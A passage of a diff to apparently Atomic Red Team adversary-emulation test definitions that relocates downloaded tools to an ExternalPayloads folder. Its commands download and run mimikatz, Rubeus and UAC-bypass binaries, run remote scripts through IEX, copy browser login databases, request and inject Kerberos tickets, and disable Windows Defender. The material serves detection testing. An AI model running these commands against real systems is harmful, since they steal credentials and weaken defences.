-      default: '%temp%\uacme\56 Akagi64.exe'
+      default: 'PathToAtomicsFolder\..\ExternalPayloads\uacme\56 Akagi64.exe'
   dependency_executor_name: powershell
   dependencies:
   - description: |
@@ -453,9 +459,10 @@ atomic_tests:
       $tempPath = cmd /c echo #{uacme_exe}
       if (Test-Path "$tempPath") {exit 0} else {exit 1}
     get_prereq_command: |
-      Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1548.002/bin/uacme.zip" -OutFile "$env:TEMP\uacme.zip"
-      Expand-Archive $env:TEMP\uacme.zip $env:TEMP\uacme -Force
-      Remove-Item $env:TEMP\uacme.zip -Force
+      New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
+      Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1548.002/bin/uacme.zip" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\uacme.zip"
+      Expand-Archive PathToAtomicsFolder\..\ExternalPayloads\uacme.zip PathToAtomicsFolder\..\ExternalPayloads\uacme -Force
+      Remove-Item PathToAtomicsFolder\..\ExternalPayloads\uacme.zip -Force
   executor:
     command: |
       "#{uacme_exe}"
@@ -490,7 +497,7 @@ atomic_tests:
     uacme_exe:
       description: Path to uacme executable
       type: path
-      default: '%temp%\uacme\59 Akagi64.exe'
+      default: 'PathToAtomicsFolder\..\ExternalPayloads\uacme\59 Akagi64.exe'
   dependency_executor_name: powershell
   dependencies:
   - description: |
@@ -499,9 +506,10 @@ atomic_tests:
       $tempPath = cmd /c echo #{uacme_exe}
       if (Test-Path "$tempPath") {exit 0} else {exit 1}
     get_prereq_command: |
-      Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1548.002/bin/uacme.zip" -OutFile "$env:TEMP\uacme.zip"
-      Expand-Archive $env:TEMP\uacme.zip $env:TEMP\uacme -Force
-      Remove-Item $env:TEMP\uacme.zip -Force
+      New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
+      Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1548.002/bin/uacme.zip" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\uacme.zip"
+      Expand-Archive PathToAtomicsFolder\..\ExternalPayloads\uacme.zip PathToAtomicsFolder\..\ExternalPayloads\uacme -Force
+      Remove-Item PathToAtomicsFolder\..\ExternalPayloads\uacme.zip -Force
   executor:
     command: |
       "#{uacme_exe}"
@@ -536,7 +544,7 @@ atomic_tests:
     uacme_exe:
       description: Path to uacme executable
       type: path
-      default: '%temp%\uacme\61 Akagi64.exe'
+      default: 'PathToAtomicsFolder\..\ExternalPayloads\uacme\61 Akagi64.exe'
   dependency_executor_name: powershell
   dependencies:
   - description: |
@@ -545,9 +553,10 @@ atomic_tests:
       $tempPath = cmd /c echo #{uacme_exe}
       if (Test-Path "$tempPath") {exit 0} else {exit 1}
     get_prereq_command: |
-      Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1548.002/bin/uacme.zip" -OutFile "$env:TEMP\uacme.zip"
-      Expand-Archive $env:TEMP\uacme.zip $env:TEMP\uacme -Force
-      Remove-Item $env:TEMP\uacme.zip -Force
+      New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
+      Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1548.002/bin/uacme.zip" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\uacme.zip"
+      Expand-Archive PathToAtomicsFolder\..\ExternalPayloads\uacme.zip PathToAtomicsFolder\..\ExternalPayloads\uacme -Force
+      Remove-Item PathToAtomicsFolder\..\ExternalPayloads\uacme.zip -Force
   executor:
     command: |
       "#{uacme_exe}"

atomics/T1550.003/T1550.003.yaml

@@ -15,7 +15,7 @@ atomic_tests:
     mimikatz_exe:
       description: Path of the Mimikatz binary
       type: path
-      default: PathToAtomicsFolder\T1550.003\bin\x64\mimikatz.exe
+      default: PathToAtomicsFolder\..\ExternalPayloads\bin\x64\mimikatz.exe
   dependency_executor_name: powershell
   dependencies:
   - description: |
@@ -24,6 +24,7 @@ atomic_tests:
       if (Test-Path #{mimikatz_exe}) {exit 0} else {exit 1}
     get_prereq_command: |
       [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+      New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
       IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-FetchFromZip.ps1" -UseBasicParsing) 
       $releases = "https://api.github.com/repos/gentilkiwi/mimikatz/releases"
       $zipUrl = (Invoke-WebRequest $releases | ConvertFrom-Json)[0].assets.browser_download_url | where-object { $_.endswith(".zip") }
@@ -57,43 +58,36 @@ atomic_tests:
       description: domain
       type: string
       default: $Env:USERDOMAIN
-    rubeus_path:
-      description: Path of the Rubeus binary
-      type: path
-      default: $Env:TEMP\rubeus.exe
     rubeus_url:
       description: URL of Rubeus executable
       type: url
       default: https://github.com/morgansec/Rubeus/raw/de21c6607e9a07182a2d2eea20bb67a22d3fbf95/Rubeus/bin/Debug/Rubeus45.exe
-    psexec_path:
-      description: Path of the PsExec binary
-      type: string
-      default: C:\PSTools\PsExec.exe
   dependency_executor_name: powershell
   dependencies:
   - description: |
-      Rubeus must exist on disk at specified location (#{rubeus_path})
+      Rubeus must exist on disk at "PathToAtomicsFolder\..\ExternalPayloads\rubeus.exe"
     prereq_command: |
-      if (Test-Path #{rubeus_path}) {exit 0} else {exit 1}
+      if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\rubeus.exe") {exit 0} else {exit 1}
     get_prereq_command: |
-      Invoke-Webrequest -Uri #{rubeus_url} -OutFile #{rubeus_path}
+      New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
+      Invoke-Webrequest -Uri #{rubeus_url} -OutFile "PathToAtomicsFolder\..\ExternalPayloads\rubeus.exe"
   - description: |
-      PsExec must exist on disk at specified location (#{psexec_path})
+      PsExec must exist on disk at "PathToAtomicsFolder\..\ExternalPayloads\PsExec.exe"
     prereq_command: |
-      if (Test-Path #{psexec_path}) {exit 0} else {exit 1}
+      if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\PsExec.exe") {exit 0} else {exit 1}
     get_prereq_command: |
-      Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "$env:TEMP\PsTools.zip"
-      Expand-Archive $env:TEMP\PsTools.zip $env:TEMP\PsTools -Force
-      New-Item -ItemType Directory (Split-Path "#{psexec_path}") -Force | Out-Null
-      Copy-Item $env:TEMP\PsTools\PsExec.exe "#{psexec_path}" -Force
+      Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\PsTools.zip"
+      Expand-Archive PathToAtomicsFolder\..\ExternalPayloads\PsTools.zip PathToAtomicsFolder\..\ExternalPayloads\PsTools -Force
+      New-Item -ItemType Directory (Split-Path "PathToAtomicsFolder\..\ExternalPayloads\PsExec.exe") -Force | Out-Null
+      Copy-Item PathToAtomicsFolder\..\ExternalPayloads\PsTools\PsExec.exe "PathToAtomicsFolder\..\ExternalPayloads\PsExec.exe" -Force
   executor:
     name: powershell
     elevation_required: true
     command: |
-      #{psexec_path} -accepteula \\#{target} -w c:\ -c #{rubeus_path} asktgt /user:#{user_name} /password:#{password} /domain:#{domain} /outfile:ticket.kirbi
-      Set-Location $env:TEMP
+      & "PathToAtomicsFolder\..\ExternalPayloads\PsExec.exe" -accepteula \\#{target} -w c:\ -c "PathToAtomicsFolder\..\ExternalPayloads\rubeus.exe" asktgt /user:#{user_name} /password:#{password} /domain:#{domain} /outfile:ticket.kirbi
+      Set-Location PathToAtomicsFolder\..\ExternalPayloads
       Move-Item -Force "\\#{target}\c$\ticket.kirbi" ticket.kirbi
       Write-Host "Successfully retrieved TGT from '#{target}', now requesting a TGS from local"
-      & "#{rubeus_path}" asktgs /service:cifs/#{target} /ticket:ticket.kirbi /ptt
-      Remove-Item $env:TEMP\ticket.kirbi
-      & "#{rubeus_path}" purge      
+      & "PathToAtomicsFolder\..\ExternalPayloads\rubeus.exe" asktgs /service:cifs/#{target} /ticket:ticket.kirbi /ptt
+      Remove-Item PathToAtomicsFolder\..\ExternalPayloads\ticket.kirbi
+      & "PathToAtomicsFolder\..\ExternalPayloads\rubeus.exe" purge      

atomics/T1555.003/T1555.003.yaml

@@ -6,7 +6,7 @@ atomic_tests:
   description: |
     A modified sysinternals suite will be downloaded and staged. The Chrome-password collector, renamed accesschk.exe, will then be executed from #{file_path}.
 
-    Successful execution will produce stdout message stating "Copying db ... passwordsDB DB Opened. statement prepare DB connection closed properly". Upon completion, final output will be a file modification of $env:TEMP\sysinternals\passwordsdb.
+    Successful execution will produce stdout message stating "Copying db ... passwordsDB DB Opened. statement prepare DB connection closed properly". Upon completion, final output will be a file modification of PathToAtomicsFolder\..\ExternalPayloads\sysinternals\passwordsdb.
 
     Adapted from [MITRE ATTACK Evals](https://github.com/mitre-attack/attack-arsenal/blob/66650cebd33b9a1e180f7b31261da1789cdceb66/adversary_emulation/APT29/CALDERA_DIY/evals/data/abilities/credential-access/e7cab9bb-3e3a-4d93-99cc-3593c1dc8c6d.yml)
   supported_platforms:
@@ -15,7 +15,7 @@ atomic_tests:
     file_path:
       description: File path for modified Sysinternals
       type: string
-      default: $env:TEMP
+      default: PathToAtomicsFolder\..\ExternalPayloads
   dependency_executor_name: powershell
   dependencies:
   - description: |
@@ -90,19 +90,20 @@ atomic_tests:
       Chrome must be installed
     prereq_command: 'if ((Test-Path "C:\Program Files\Google\Chrome\Application\chrome.exe") -Or (Test-Path "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe")) {exit 0} else {exit 1}'
     get_prereq_command: |
-      $installer = "$env:temp\ChromeStandaloneSetup64.msi"
-      Invoke-WebRequest -OutFile $env:temp\ChromeStandaloneSetup64.msi https://dl.google.com/chrome/install/googlechromestandaloneenterprise64.msi
+      New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
+      $installer = "PathToAtomicsFolder\..\ExternalPayloads\ChromeStandaloneSetup64.msi"
+      Invoke-WebRequest -OutFile PathToAtomicsFolder\..\ExternalPayloads\ChromeStandaloneSetup64.msi https://dl.google.com/chrome/install/googlechromestandaloneenterprise64.msi
       msiexec /i $installer /qn
       Start-Process -FilePath "chrome.exe"
       Stop-Process -Name "chrome"
   executor:
     name: powershell
     command: |
-      Copy-Item "$env:LOCALAPPDATA\Google\Chrome\User Data\Default\Login Data" -Destination $env:temp
-      Copy-Item "$env:LOCALAPPDATA\Google\Chrome\User Data\Default\Login Data For Account" -Destination $env:temp
+      Copy-Item "$env:LOCALAPPDATA\Google\Chrome\User Data\Default\Login Data" -Destination PathToAtomicsFolder\..\ExternalPayloads
+      Copy-Item "$env:LOCALAPPDATA\Google\Chrome\User Data\Default\Login Data For Account" -Destination PathToAtomicsFolder\..\ExternalPayloads
     cleanup_command: |
-      Remove-Item -Path "$env:temp\Login Data" -Force -ErrorAction Ignore
-      Remove-Item -Path "$env:temp\Login Data For Account" -Force -ErrorAction Ignore
+      Remove-Item -Path "PathToAtomicsFolder\..\ExternalPayloads\Login Data" -Force -ErrorAction Ignore
+      Remove-Item -Path "PathToAtomicsFolder\..\ExternalPayloads\Login Data For Account" -Force -ErrorAction Ignore
 - name: Simulating access to Opera Login Data
   auto_generated_guid: 28498c17-57e4-495a-b0be-cc1e36de408b
   description: |
@@ -115,8 +116,9 @@ atomic_tests:
       Opera must be installed
     prereq_command: 'if (((Test-Path "$env:LOCALAPPDATA\Programs\Opera\launcher.exe") -Or (Test-Path "C:\Program Files\Opera\launcher.exe") -Or (Test-Path "C:\Program Files (x86)\Opera\launcher.exe"))) {exit 0} else {exit 1}'
     get_prereq_command: |
-      $installer = "$env:temp\OperaStandaloneInstaller.exe"
-      Invoke-WebRequest -OutFile $env:temp\OperaStandaloneInstaller.exe https://get.geo.opera.com/pub/opera/desktop/82.0.4227.43/win/Opera_82.0.4227.43_Setup.exe
+      New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
+      $installer = "PathToAtomicsFolder\..\ExternalPayloads\OperaStandaloneInstaller.exe"
+      Invoke-WebRequest -OutFile PathToAtomicsFolder\..\ExternalPayloads\OperaStandaloneInstaller.exe https://get.geo.opera.com/pub/opera/desktop/82.0.4227.43/win/Opera_82.0.4227.43_Setup.exe
       Start-Process $installer -ArgumentList '/install /silent /launchopera=1 /setdefaultbrowser=0'
       Start-Sleep -s 180
       Stop-Process -Name "opera"
@@ -128,9 +130,9 @@ atomic_tests:
   executor:
     name: powershell
     command: |
-      Copy-Item "$env:APPDATA\Opera Software\Opera Stable\Login Data" -Destination $env:temp
+      Copy-Item "$env:APPDATA\Opera Software\Opera Stable\Login Data" -Destination PathToAtomicsFolder\..\ExternalPayloads
     cleanup_command: |
-      Remove-Item -Path "$env:temp\Login Data" -Force -ErrorAction Ignore
+      Remove-Item -Path "PathToAtomicsFolder\..\ExternalPayloads\Login Data" -Force -ErrorAction Ignore
 - name: Simulating access to Windows Firefox Login Data
   auto_generated_guid: eb8da98a-2e16-4551-b3dd-83de49baa14c
   description: |
@@ -144,8 +146,9 @@ atomic_tests:
       Firefox must be installed
     prereq_command: 'if ((Test-Path "C:\Program Files\Mozilla Firefox\firefox.exe") -Or (Test-Path "C:\Program Files (x86)\Mozilla Firefox\firefox.exe")) {exit 0} else {exit 1}'
     get_prereq_command: |
+      New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
       if ($env:PROCESSOR_ARCHITECTURE -eq 'AMD64') {$url="https://download.mozilla.org/?product=firefox-latest-ssl&os=win64&lang=en-US"}else {$url="https://download.mozilla.org/?product=firefox-latest-ssl&os=win&lang=en-US"}
-      $installer = "$env:temp\firefoxsetup.exe"
+      $installer = "PathToAtomicsFolder\..\ExternalPayloads\firefoxsetup.exe"
       (New-Object Net.WebClient).DownloadFile($url,$installer)
       Start-Process $installer -ArgumentList '/S' -Wait
   - description: |
@@ -160,9 +163,9 @@ atomic_tests:
   executor:
     name: powershell
     command: |
-      Copy-Item "$env:APPDATA\Mozilla\Firefox\Profiles\" -Destination $env:temp -Force -Recurse
+      Copy-Item "$env:APPDATA\Mozilla\Firefox\Profiles\" -Destination PathToAtomicsFolder\..\ExternalPayloads -Force -Recurse
     cleanup_command: |
-      Remove-Item -Path "$env:temp\Profiles" -Force -ErrorAction Ignore -Recurse
+      Remove-Item -Path "PathToAtomicsFolder\..\ExternalPayloads\Profiles" -Force -ErrorAction Ignore -Recurse
 - name: Simulating access to Windows Edge Login Data
   auto_generated_guid: a6a5ec26-a2d1-4109-9d35-58b867689329
   description: |
@@ -188,9 +191,9 @@ atomic_tests:
   executor:
     name: powershell
     command: |
-      Copy-Item "$env:LOCALAPPDATA\Microsoft\Edge\User Data\Default" -Destination $env:temp\Edge -Force -Recurse
+      Copy-Item "$env:LOCALAPPDATA\Microsoft\Edge\User Data\Default" -Destination PathToAtomicsFolder\..\ExternalPayloads\Edge -Force -Recurse
     cleanup_command: |
-      Remove-Item -Path "$env:temp\Edge" -Force -ErrorAction Ignore -Recurse
+      Remove-Item -Path "PathToAtomicsFolder\..\ExternalPayloads\Edge" -Force -ErrorAction Ignore -Recurse
 - name: Decrypt Mozilla Passwords with Firepwd.py
   auto_generated_guid: dc9cd677-c70f-4df5-bd1c-f114af3c2381
   description: |
@@ -202,7 +205,7 @@ atomic_tests:
     Firepwd_Path:
       description: Filepath for Firepwd.py
       type: string
-      default: $env:temp\Firepwd.py
+      default: PathToAtomicsFolder\..\ExternalPayloads\Firepwd.py
     Out_Filepath:
       description: Filepath to output results to
       type: string
@@ -228,8 +231,9 @@ atomic_tests:
     prereq_command: |
       if (get-childitem -path "$env:appdata\Mozilla\Firefox\Profiles\*.default-release\" -erroraction silentlycontinue) {exit 0} else {exit 1}
     get_prereq_command: |
-      Invoke-WebRequest "https://ftp.mozilla.org/pub/firefox/releases/98.0/win64/en-US/Firefox%20Setup%2098.0.msi" -outfile "$env:temp\firefox.msi"
-      msiexec.exe /i "$env:temp\firefox.msi" /quiet
+      New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
+      Invoke-WebRequest "https://ftp.mozilla.org/pub/firefox/releases/98.0/win64/en-US/Firefox%20Setup%2098.0.msi" -outfile "PathToAtomicsFolder\..\ExternalPayloads\firefox.msi"
+      msiexec.exe /i "PathToAtomicsFolder\..\ExternalPayloads\firefox.msi" /quiet
       sleep -s 30
       start-process "$env:programfiles\Mozilla Firefox\firefox.exe".
       sleep -s 5
@@ -239,25 +243,25 @@ atomic_tests:
     prereq_command: |
       if (Test-Path "#{VS_CMD_Path}") {exit 0} else {exit 1}
     get_prereq_command: |
-      invoke-webrequest "https://aka.ms/vs/17/release/vs_BuildTools.exe" -outfile "$env:temp\VS_BuildTools.exe"
-      write-host "Visual Studio Build Tools (Desktop Development with C++) must be installed manually. Please run the installer from $env:temp\VS_BuildTools.exe."
+      invoke-webrequest "https://aka.ms/vs/17/release/vs_BuildTools.exe" -outfile "PathToAtomicsFolder\..\ExternalPayloads\VS_BuildTools.exe"
+      write-host "Visual Studio Build Tools (Desktop Development with C++) must be installed manually. Please run the installer from PathToAtomicsFolder\..\ExternalPayloads\VS_BuildTools.exe."
   - description: |
       Python must be installed
     prereq_command: |
       if (Test-Path "#{Python_Path}") {exit 0} else {exit 1}
     get_prereq_command: |
-      invoke-webrequest "https://www.python.org/ftp/python/3.10.4/python-3.10.4-amd64.exe" -outfile "$env:temp\python_setup.exe"
-      Start-Process -FilePath $env:TEMP\python_setup.exe -ArgumentList "/quiet InstallAllUsers=1 PrependPath=1 Include_test=0" -Wait
+      invoke-webrequest "https://www.python.org/ftp/python/3.10.4/python-3.10.4-amd64.exe" -outfile "PathToAtomicsFolder\..\ExternalPayloads\python_setup.exe"
+      Start-Process -FilePath PathToAtomicsFolder\..\ExternalPayloads\python_setup.exe -ArgumentList "/quiet InstallAllUsers=1 PrependPath=1 Include_test=0" -Wait
   - description: |
       Pip must be installed.
     prereq_command: |
       $env:Path = [System.Environment]::ExpandEnvironmentVariables([System.Environment]::GetEnvironmentVariable("Path","Machine") + ";" + [System.Environment]::GetEnvironmentVariable("Path","User"))
       if (pip -v) {exit 0} else {exit 1}
     get_prereq_command: |
-      invoke-webrequest "https://bootstrap.pypa.io/ez_setup.py" -outfile "$env:temp\ez_setup.py"      
-      invoke-webrequest "https://bootstrap.pypa.io/get-pip.py" -outfile "$env:temp\get-pip.py"
-      cmd /c "$env:temp\ez_setup.py"
-      cmd /c "$env:temp\get-pip.py"
+      invoke-webrequest "https://bootstrap.pypa.io/ez_setup.py" -outfile "PathToAtomicsFolder\..\ExternalPayloads\ez_setup.py"      
+      invoke-webrequest "https://bootstrap.pypa.io/get-pip.py" -outfile "PathToAtomicsFolder\..\ExternalPayloads\get-pip.py"
+      cmd /c "PathToAtomicsFolder\..\ExternalPayloads\ez_setup.py"
+      cmd /c "PathToAtomicsFolder\..\ExternalPayloads\get-pip.py"
   - description: |
       Pycryptodome library must be installed 
     prereq_command: |
@@ -426,8 +430,9 @@ atomic_tests:
     prereq_command: |
       'if ((Test-Path "C:\Program Files\Google\Chrome\Application\chrome.exe") -Or (Test-Path "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe")) {exit 0} else {exit 1}'
     get_prereq_command: |
-      $installer = "$env:temp\ChromeStandaloneSetup64.msi"
-      Invoke-WebRequest -OutFile $env:temp\ChromeStandaloneSetup64.msi https://dl.google.com/chrome/install/googlechromestandaloneenterprise64.msi
+      New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
+      $installer = "PathToAtomicsFolder\..\ExternalPayloads\ChromeStandaloneSetup64.msi"
+      Invoke-WebRequest -OutFile PathToAtomicsFolder\..\ExternalPayloads\ChromeStandaloneSetup64.msi https://dl.google.com/chrome/install/googlechromestandaloneenterprise64.msi
       msiexec /i $installer /qn
       Start-Process -FilePath "chrome.exe"
       Stop-Process -Name "chrome"
@@ -445,13 +450,13 @@ atomic_tests:
       Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T155.003/src/LoginData?raw=true" -Outfile: "PathToAtomicsFolder\T1555.003\src\Login Data"
   executor:
     command: |
-      Copy-Item "$env:localappdata\Google\Chrome\User Data\Default\Login Data" -Destination "$env:temp" > $null
+      Copy-Item "$env:localappdata\Google\Chrome\User Data\Default\Login Data" -Destination "PathToAtomicsFolder\..\ExternalPayloads" > $null
       Remove-Item "$env:localappdata\Google\Chrome\User Data\Default\Login Data" > $null
       Copy-Item "$env:PathToAtomicsFolder\T1555.003\src\Login Data" -Destination "$env:localappdata\Google\Chrome\User Data\Default\" > $null
       cd "$env:PathToAtomicsFolder\T1555.003\bin"
       .\BrowserCollector.exe
     cleanup_command: |
       Remove-Item "$env:localappdata\Google\Chrome\User Data\Default\Login Data" > $null
-      Copy-Item "$env:temp" -Destination "$env:localappdata\Google\Chrome\User Data\Default\Login Data" > $null
-      Remove-Item "$env:temp\Login Data" > $null
+      Copy-Item "PathToAtomicsFolder\..\ExternalPayloads" -Destination "$env:localappdata\Google\Chrome\User Data\Default\Login Data" > $null
+      Remove-Item "PathToAtomicsFolder\..\ExternalPayloads\Login Data" > $null
     name: powershell

atomics/T1558.001/T1558.001.yaml

@@ -29,7 +29,7 @@ atomic_tests:
     mimikatz_path:
       description: Mimikatz windows executable
       type: path
-      default: '$env:TEMP\mimikatz\x64\mimikatz.exe'
+      default: 'PathToAtomicsFolder\..\ExternalPayloads\mimikatz\x64\mimikatz.exe'
   dependency_executor_name: powershell
   dependencies:
   - description: |
@@ -39,6 +39,7 @@ atomic_tests:
       if (Test-Path $mimikatz_path) {exit 0} else {exit 1}
     get_prereq_command: |
       [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+      New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
       IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-FetchFromZip.ps1" -UseBasicParsing) 
       $releases = "https://api.github.com/repos/gentilkiwi/mimikatz/releases"
       $zipUrl = (Invoke-WebRequest $releases | ConvertFrom-Json)[0].assets.browser_download_url | where-object { $_.endswith(".zip") }

atomics/T1558.002/T1558.002.yaml

@@ -32,7 +32,7 @@ atomic_tests:
     mimikatz_path:
       description: Mimikatz windows executable
       type: path
-      default: '$env:TEMP\mimikatz\x64\mimikatz.exe'
+      default: 'PathToAtomicsFolder\..\ExternalPayloads\mimikatz\x64\mimikatz.exe'
   dependency_executor_name: powershell
   dependencies:
   - description: |
@@ -42,6 +42,7 @@ atomic_tests:
       if (Test-Path $mimikatz_path) {exit 0} else {exit 1}
     get_prereq_command: |
       [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+      New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
       IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-FetchFromZip.ps1" -UseBasicParsing) 
       $releases = "https://api.github.com/repos/gentilkiwi/mimikatz/releases"
       $zipUrl = (Invoke-WebRequest $releases | ConvertFrom-Json)[0].assets.browser_download_url | where-object { $_.endswith(".zip") }

atomics/T1558.003/T1558.003.yaml

@@ -37,7 +37,7 @@ atomic_tests:
     local_folder:
       description: Local path of Rubeus executable
       type: path
-      default: $Env:temp
+      default: PathToAtomicsFolder\..\ExternalPayloads
     local_executable:
       description: name of the rubeus executable
       type: string
@@ -67,6 +67,7 @@ atomic_tests:
     prereq_command: |
       if(Test-Path -Path #{local_folder}\#{local_executable}) {exit 0} else {exit 1}
     get_prereq_command: |
+      New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
       Invoke-Webrequest -Uri #{rubeus_url} -OutFile #{local_folder}\#{local_executable}
   executor:
     command: |

atomics/T1558.004/T1558.004.yaml

@@ -12,7 +12,7 @@ atomic_tests:
     local_folder:
       description: Local path of Rubeus executable
       type: path
-      default: $Env:temp
+      default: PathToAtomicsFolder\..\ExternalPayloads
     local_executable:
       description: name of the rubeus executable
       type: string
@@ -38,6 +38,7 @@ atomic_tests:
     prereq_command: |
       if(Test-Path -Path #{local_folder}\#{local_executable}) {exit 0} else {exit 1}
     get_prereq_command: |
+      New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
       Invoke-Webrequest -Uri #{rubeus_url} -OutFile #{local_folder}\#{local_executable}
   executor:
     command: |

atomics/T1560.001/T1560.001.yaml

@@ -107,9 +107,10 @@ atomic_tests:
       cmd /c 'if not exist "#{winzip_exe}" (echo 1) else (echo 0)'
     get_prereq_command: |
       IEX(IWR "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-WebRequestVerifyHash.ps1" -UseBasicParsing)
-      if(Invoke-WebRequestVerifyHash "#{winzip_url}" "$env:Temp\winzip.exe" #{winzip_hash}){
+      New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
+      if(Invoke-WebRequestVerifyHash "#{winzip_url}" "PathToAtomicsFolder\..\ExternalPayloads\winzip.exe" #{winzip_hash}){
         Write-Host Follow the installation prompts to continue
-        cmd /c "$env:Temp\winzip.exe"
+        cmd /c "PathToAtomicsFolder\..\ExternalPayloads\winzip.exe"
       }
   executor:
     name: command_prompt

atomics/T1562.001/T1562.001.yaml

@@ -186,18 +186,19 @@ atomic_tests:
   - description: |
       Sysmon must be downloaded
     prereq_command: |
-      if ((cmd.exe /c "where.exe Sysmon.exe 2> nul | findstr Sysmon 2> nul") -or (Test-Path $env:Temp\Sysmon\Sysmon.exe)) { exit 0 } else { exit 1 }
+      if ((cmd.exe /c "where.exe Sysmon.exe 2> nul | findstr Sysmon 2> nul") -or (Test-Path PathToAtomicsFolder\..\ExternalPayloads\Sysmon\Sysmon.exe)) { exit 0 } else { exit 1 }
     get_prereq_command: |
-      Invoke-WebRequest "https://download.sysinternals.com/files/Sysmon.zip" -OutFile "$env:TEMP\Sysmon.zip"
-      Expand-Archive $env:TEMP\Sysmon.zip $env:TEMP\Sysmon -Force
-      Remove-Item $env:TEMP\Sysmon.zip -Force
+      New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
+      Invoke-WebRequest "https://download.sysinternals.com/files/Sysmon.zip" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\Sysmon.zip"
+      Expand-Archive PathToAtomicsFolder\..\ExternalPayloads\Sysmon.zip PathToAtomicsFolder\..\ExternalPayloads\Sysmon -Force
+      Remove-Item PathToAtomicsFolder\..\ExternalPayloads\Sysmon.zip -Force
   - description: |
       sysmon must be Installed
     prereq_command: |
       if(sc.exe query sysmon | findstr sysmon) { exit 0 } else { exit 1 }
     get_prereq_command: |
       if(cmd.exe /c "where.exe Sysmon.exe 2> nul | findstr Sysmon 2> nul") { C:\Windows\Sysmon.exe -accepteula -i } else
-      { Set-Location $env:TEMP\Sysmon\; .\Sysmon.exe -accepteula -i}
+      { Set-Location PathToAtomicsFolder\..\ExternalPayloads\Sysmon\; .\Sysmon.exe -accepteula -i}
   - description: |
       sysmon filter must be loaded
     prereq_command: |
@@ -564,7 +565,7 @@ atomic_tests:
     DefenderControlExe:
       description: Path to Defender Control software version 1.6.
       type: string
-      default: $env:temp\DefenderControl\DefenderControl\DefenderControl.exe
+      default: PathToAtomicsFolder\..\ExternalPayloads\DefenderControl\DefenderControl\DefenderControl.exe
   dependency_executor_name: powershell
   dependencies:
   - description: |
@@ -572,8 +573,9 @@ atomic_tests:
     prereq_command: |
       if (Test-Path #{DefenderControlExe}) {exit 0} else {exit 1}
     get_prereq_command: |
-      Start-BitsTransfer -Source "https://web.archive.org/web/20201210152711/https://www.sordum.org/files/download/defender-control/DefenderControl.zip" -Destination "$env:temp\defendercontrol.zip" -dynamic
-      expand-archive -LiteralPath "$env:temp\defendercontrol.zip" -DestinationPath "$env:temp\DefenderControl"
+      New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
+      Invoke-WebRequest "https://web.archive.org/web/20201210152711/https://www.sordum.org/files/download/defender-control/DefenderControl.zip" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\defendercontrol.zip"
+      expand-archive -LiteralPath "PathToAtomicsFolder\..\ExternalPayloads\defendercontrol.zip" -DestinationPath "PathToAtomicsFolder\..\ExternalPayloads\DefenderControl"
   executor:
     command: |
       cmd /c #{DefenderControlExe} /D #{DefenderID} | Out-Null
@@ -594,7 +596,7 @@ atomic_tests:
     AdvancedRun_Location:
       description: Path of Advanced Run executable
       type: path
-      default: '$env:temp\AdvancedRun.exe'
+      default: 'PathToAtomicsFolder\..\ExternalPayloads\AdvancedRun.exe'
     delete_defender_folder:
       description: Set to 1 to also delete the Windows Defender folder
       type: integer
@@ -606,8 +608,9 @@ atomic_tests:
     prereq_command: |
       if(Test-Path -Path #{AdvancedRun_Location}) {exit 0} else {exit 1}
